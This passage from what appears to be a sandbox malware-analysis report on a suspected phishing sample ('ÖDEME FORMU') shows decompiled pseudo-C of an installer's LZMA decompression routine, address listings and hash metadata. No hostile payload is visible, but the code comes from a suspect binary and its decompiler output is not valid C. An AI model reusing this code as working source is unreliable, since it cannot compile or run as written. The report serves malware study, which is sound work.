								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00405ee4
0x00405eeb
0x00405ef1
0x00405ef7
0x00000000
0x00405efb
0x00405f07
0x00405f07
0x00405f07
0x00405f10
0x00000000
0x00000000
0x00405f16
0x00000000
0x00405f1d
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f32
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f7d
0x00405f80
0x00405fa8
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f82
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9a
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff1
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ff6
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406013
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x00406059
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406701
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x00406737
0x0040673e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406740
0x00406740
0x00406744
0x004068f3
0x00000000
0x004068f3
0x00406750
0x00406757
0x0040675f
0x0040675f
0x0040675f
0x00406762
0x00406765
0x00406765
0x00000000
0x00000000
0x00406083
0x00406085
0x00406088
0x004060f9
0x004060fc
0x004060ff
0x00406106
0x00406110
0x00000000
0x00406110
0x0040608a
0x0040608e
0x00406091
0x00406093
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060ab
0x004060af
0x004060b6
0x004060b9
0x004060c0
0x004060c4
0x004060cc
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d0
0x004060d3
0x004060f1
0x004060f3
0x00000000
0x004060f3
0x004060d5
0x004060d8
0x004060db
0x004060de
0x004060e0
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00000000
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x00000000
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x00000000
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x00000000
0x0040645b
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x0040611c
0x0040611c
0x00406120
0x0040688d
0x00000000
0x0040688d
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613b
0x0040613e
0x00406141
0x00406141
0x00406144
0x00406147
0x00000000
0x00000000
0x0040614d
0x00406153
0x00000000
0x00000000
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406184
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b7
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c0
0x004061c7
0x004061ca
0x00000000
0x004061d0
0x00000000
0x004061d0
0x00000000
0x004061d5
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f4
0x004061f7
0x004061fa
0x004061fa
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x0040621d
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x00406248
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x0040624d
0x00406254
0x00406257
0x00000000
0x00406259
0x00000000
0x00406259
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x0040625e
0x00000000
0x00000000
0x00406299
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062b8
0x004062bb
0x004062be
0x004062be
0x004062c4
0x00406262
0x00406262
0x00406265
0x00000000
0x00406265
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e1
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630c
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406311
0x00406318
0x0040631b
0x00000000
0x0040631d
0x00000000
0x0040631d
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x00000000
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x004066ef
0x004066ef
0x00000000
0x004066ef
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x0040676b
0x0040676b
0x00000000
0x0040676b
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
0x00000000
0x0040684a
0x00000000
0x004064e6
0x004064e9
0x0040651f
0x0040664f
0x0040664f
0x0040664f
0x0040664f
0x00406652
0x00406652
0x00406655
0x00406657
0x004068e1
0x00000000
0x004068e1
0x0040665d
0x00406660
0x00000000
0x00000000
0x00406666
0x0040666a
0x0040666d
0x0040666d
0x0040666d
0x00000000
0x0040666d
0x004064eb
0x004064ed
0x004064ef
0x004064f1
0x004064f4
0x004064f5
0x004064f7
0x004064f9
0x004064fc
0x004064ff
0x00406515
0x0040651a
0x00406552
0x00406552
0x00406556
0x00406582
0x00406584
0x0040658b
0x0040658e
0x00406591
0x00406591
0x00406596
0x00406596
0x00406598
0x0040659b
0x004065a2
0x004065a5
0x004065d2
0x004065d2
0x004065d5
0x004065d8
0x0040664c
0x0040664c
0x0040664c
0x00000000
0x0040664c
0x004065da
0x004065e0
0x004065e3
0x004065e6
0x004065e9
0x004065ec
0x004065ef
0x004065f2
0x004065f5
0x004065f8
0x004065fb
0x00406614
0x00406616
0x00406619
0x0040661a
0x0040661d
0x0040661f
0x00406622
0x00406624
0x00406626
0x00406629
0x0040662b
0x0040662e
0x00406632
0x00406634
0x00406634
0x00406635
0x00406638
0x0040663b
0x004065fd
0x004065fd
0x00406605
0x0040660a
0x0040660c
0x0040660f
0x0040660f
0x0040663e
0x00406645
0x004065cf
0x004065cf
0x004065cf
0x004065cf
0x00000000
0x00406647
0x00000000
0x00406647
0x00406645
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406563
0x00406566
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406571
0x00406571
0x00406574
0x0040657b
0x0040654f
0x0040654f
0x0040654f
0x0040654f
0x00000000
0x0040657d
0x00000000
0x0040657d
0x0040657b
0x00406501
0x00406504
0x00406506
0x00406509
0x00000000
0x00000000
0x00406268
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x00000000
0x00000000
0x004063f3
0x004063f3
0x004063f7
0x004068bd
0x00000000
0x004068bd
0x004063fd
0x00406400
0x00406403
0x00406406
0x00406408
0x00406408
0x00406408
0x0040640b
0x0040640e
0x00406411
0x00406414
0x00406417
0x0040641a
0x0040641b
0x0040641d
0x0040641d
0x0040641d
0x00406420
0x00406423
0x00406426
0x00406429
0x00406429
0x00406429
0x0040642c
0x0040642e
0x0040642e
0x00000000
0x00000000
0x00406670
0x00406670
0x00406670
0x00406674
0x00000000
0x00000000
0x0040667a
0x0040667d
0x00406680
0x00406683
0x00406685
0x00406685
0x00406685
0x00406688
0x0040668b
0x0040668e
0x00406691
0x00406694
0x00406697
0x00406698
0x0040669a
0x0040669a
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066ad
0x004066af
0x004066b2
0x00000000
0x004066b4
0x00406431
0x00406431
0x00000000
0x00406431
0x004066b2
0x004068e7
0x00406909
0x0040690f
0x00406911
0x00406918
0x00000000
0x00000000
0x00405f16
0x0040691e
0x0040691e
0x00000000

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
Instruction ID: 41b63ac7315969e8c4cdeb39c952146f886d2b6e08649ca9387d619dcd40c967
Opcode Fuzzy Hash: b0886b8647590f49d196a4ae9d285ef76414e2f02c97ef520e18707fbbef2023
Instruction Fuzzy Hash: A8817871D04229CFDF24CFA8C8447AEBBB0FB44305F25816AD856BB281D7785A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406322 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406322() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406926))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
